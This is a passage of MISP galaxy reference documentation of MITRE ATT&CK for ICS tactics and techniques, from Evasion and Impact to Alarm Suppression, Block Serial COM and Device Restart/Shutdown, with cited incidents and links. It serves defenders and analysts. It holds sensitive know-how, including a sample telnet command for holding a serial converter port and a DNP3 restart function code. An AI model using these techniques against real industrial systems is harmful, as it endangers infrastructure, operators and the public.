The adversary is trying to avoid being detected.Evasion consists of techniques that adversaries use to avoid detection by both human operators and technical defenses throughout their compromise. Techniques used for evasion include removal of indicators of compromise, spoofing communications and reporting, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense and operator evasion for this purpose are often more passive in nature, as opposed to Inhibit Response Function techniques. They may also vary depending on whether the target of evasion is human or technological in nature, such as security controls. Techniques under other tactics are cross-listed to evasion when those techniques include the added benefit of subverting operators and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Evasion"

Table 4365. Table References
Links
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://attack.mitre.org/wiki/Technique/T1014
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

Execution

The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network Discovery and Collection, impact operations, and inhibit response functions.

The tag is: misp-galaxy:mitre-ics-tactics="Execution"

Table 4366. Table References
Links
https://attack.mitre.org/wiki/Technique/T1059
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
http://www.dee.ufrj.br/controle_automatico/cursos/IEC61131-3_Programming_Industrial_Automation_Systems.pdf
https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=
http://www.plcdev.com/book/export/html/373
https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf
https://www.f-secure.com/weblog/archives/00002718.html

Impact

The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment. Impact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage Impair Process Control techniques, which often manifest in more self-revealing impacts on operations, or Inhibit Response Function techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach. Loss of Productivity and Revenue, Theft of Operational Information, and Damage to Property are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.

The tag is: misp-galaxy:mitre-ics-tactics="Impact"

Table 4367. Table References
Links
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3[https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3]
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://time.com/4270728/iran-cyber-attack-dam-fbi/
https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

Impair Process Control

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: misp-galaxy:mitre-ics-tactics="Impair Process Control"

Table 4368. Table References
Links
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices
https://attack.mitre.org/techniques/T1489/
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

Inhibit Response Function

The tag is: misp-galaxy:mitre-ics-tactics="Inhibit Response Function"

Table 4369. Table References
Links
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://attack.mitre.org/wiki/Technique/T1107
https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A
https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
http://cwe.mitre.org/data/definitions/400.html
https://nvd.nist.gov/vuln/detail/CVE-2015-5374
https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf
https://attack.mitre.org/wiki/Technique/T1014
http://www.sciencedirect.com/science/article/pii/S1874548213000231

Initial Access

The adversary is trying to get into your ICS environment. Initial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.

The tag is: misp-galaxy:mitre-ics-tactics="Initial Access"

Table 4370. Table References
Links
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
https://www.us-cert.gov/ncas/alerts/TA18-074A
https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B
https://attack.mitre.org/wiki/Technique/T1133
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/
https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01
https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf
https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
https://time.com/4270728/iran-cyber-attack-dam-fbi/
https://www.kkw-gundremmingen.de/presse.php?id=571
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant
https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS
https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml
https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant
https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/
https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/
https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298
https://www.bbc.com/news/technology-36158606
https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/
https://attack.mitre.org/techniques/T1193/
https://www.f-secure.com/weblog/archives/00002718.html
https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf
https://www.slideshare.net/dgpeters/17-bolshev-1-13
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Techniques

A list of Techniques in ATT&CK for ICS..

Techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Activate Firmware Update Mode

Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.

The tag is: misp-galaxy:mitre-ics-techniques="Activate Firmware Update Mode"

Table 4371. Table References
Links
https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Alarm Suppression

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. In the Maroochy Attack, the adversary suppressed alarm reporting to the central computer. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. The method of suppression may greatly depend on the type of alarm in question: An alarm raised by a protocol message. An alarm signaled with I/O. An alarm bit set in a flag and read In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring.2 Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.

The tag is: misp-galaxy:mitre-ics-techniques="Alarm Suppression"

Table 4372. Table References
Links
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

Automated Collection

Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.

The tag is: misp-galaxy:mitre-ics-techniques="Automated Collection"

Table 4373. Table References
Links
https://www.f-secure.com/weblog/archives/00002718.html
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Block Command Message

Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. In the 2015 attack on the Ukranian power grid, malicious firmware was used to render communication devices inoperable and effectively prevent them from receiving remote command messages.

The tag is: misp-galaxy:mitre-ics-techniques="Block Command Message"

Table 4374. Table References
Links
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Reporting Message

Adversaries may block or prevent a reporting message from reaching its intended target. Reporting messages relay the status of control system devices, which can include event log data and I/O values of the associated device. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. In the 2015 attack on the Ukranian power grid, malicious firmware was used to render communication devices inoperable and effectively block messages from being reported.

The tag is: misp-galaxy:mitre-ics-techniques="Block Reporting Message"

Table 4375. Table References
Links
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Serial COM

Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available — 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.

The tag is: misp-galaxy:mitre-ics-techniques="Block Serial COM"

Table 4376. Table References
Links
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Brute Force I/O

Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.

The tag is: misp-galaxy:mitre-ics-techniques="Brute Force I/O"

Table 4377. Table References
Links
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Change Program State

Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.

The tag is: misp-galaxy:mitre-ics-techniques="Change Program State"

Table 4378. Table References
Links
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Command-Line Interface

Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.

The tag is: misp-galaxy:mitre-ics-techniques="Command-Line Interface"

Table 4379. Table References
Links
https://attack.mitre.org/wiki/Technique/T1059
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Commonly Used Port

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples as follows TCP:80 (HTTP), TCP:443 (HTTPS), TCP/UDP:53 (DNS), TCP:1024-4999 (OPC on XP/Win2k3), TCP:49152-65535 (OPC on Vista and later), TCP:23 (TELNET), UDP:161 (SNMP), TCP:502 (MODBUS), TCP:102 (S7comm/ISO-TSAP), TCP:20000 (DNP3), TCP:44818 (Ethernet/IP)

The tag is: misp-galaxy:mitre-ics-techniques="Commonly Used Port"

Table 4380. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA17-293A
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Connection Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

The tag is: misp-galaxy:mitre-ics-techniques="Connection Proxy"

Table 4381. Table References
Links
https://attack.mitre.org/wiki/Technique/T1090
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
https://www.cpni.gov.uk/Documents/Publications/2014/2014-04-23-c2-report-birmingham.pdf

Damage to Property

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in Loss of Safety. Operations that result in Loss of Control may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of Loss of Productivity and Revenue. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community’s now blackened rivers. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland.345 Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops.4 Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside.

The tag is: misp-galaxy:mitre-ics-techniques="Damage to Property"

Table 4382. Table References
Links
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3[https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3]
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Data Destruction

Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.

The tag is: misp-galaxy:mitre-ics-techniques="Data Destruction"

Table 4383. Table References
Links
https://attack.mitre.org/wiki/Technique/T1107
https://dragos.com/blog/crashoverride/CrashOverride-01.pdf
https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Historian Compromise

Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. Dragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution.1 The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include refs to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be expected to have extensive connections within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.

The tag is: misp-galaxy:mitre-ics-techniques="Data Historian Compromise"

Table 4384. Table References
Links
https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

Data from Information Repositories

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of target information repositories include reference databases and local machines on the process environment.

The tag is: misp-galaxy:mitre-ics-techniques="Data from Information Repositories"

Table 4385. Table References
Links
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Default Credentials

Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.

The tag is: misp-galaxy:mitre-ics-techniques="Default Credentials"

Table 4386. Table References
Links
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Denial of Control

Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network preventing them from issuing any controls.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Control"

Table 4387. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Denial of Service

Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a or denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through Control Device Identification. There are examples of adversaries remotely causing a Device Restart/Shutdown by exploiting a vulnerability that induces uncontrolled resource consumption. In the Maroochy attack, the adversary was able to shut an investigator out of the network.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Service"

Table 4388. Table References
Links
https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A
https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
http://cwe.mitre.org/data/definitions/400.html
https://nvd.nist.gov/vuln/detail/CVE-2015-5374
https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Denial of View

Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment’s data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network, preventing them from viewing the state of the system.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of View"

Table 4389. Table References
Links
https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

Detect Operating Mode

Adversaries may gather information about the current operating state of a PLC. CPU operating modes are often controlled by a key switch on the PLC. Example states may be run, prog, stop, remote, and invalid. Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Operating Mode"

Table 4390. Table References
Links
Triton contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.[Triton contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.]

Detect Program State

Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it’s running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Program State"

Table 4391. Table References
Links
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Device Restart/Shutdown

Adversaries may forcibly restart or shutdown a device in the ICS environment to disrupt and potentially cause adverse effects on the physical processes it helps to control. Methods of device restart and shutdown exist as built-in, standard functionalities. This can include interactive device web interfaces, CLIs, and network protocol commands, among others. Device restart or shutdown may also occur as a consequence of changing a device into an alternative mode of operation for testing or firmware loading. Unexpected restart or shutdown of control system devices may contribute to impact, by preventing expected response functions from activating and being received in critical states. This can also be a sign of malicious device modification, as many updates require a shutdown in order to take affect. For example, DNP3’s function code 0x0D can reset and reconfigure DNP3 outstations by forcing them to perform a complete power cycle. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries scheduled disconnects for the uniterruptable power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered.

The tag is: misp-galaxy:mitre-ics-techniques="Device Restart/Shutdown"

Table 4392. Table References
Links
http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258
https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf
https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Drive-by Compromise

Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session.With this technique, the user’s web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.

The tag is: misp-galaxy:mitre-ics-techniques="Drive-by Compromise"

Table 4393. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA18-074A
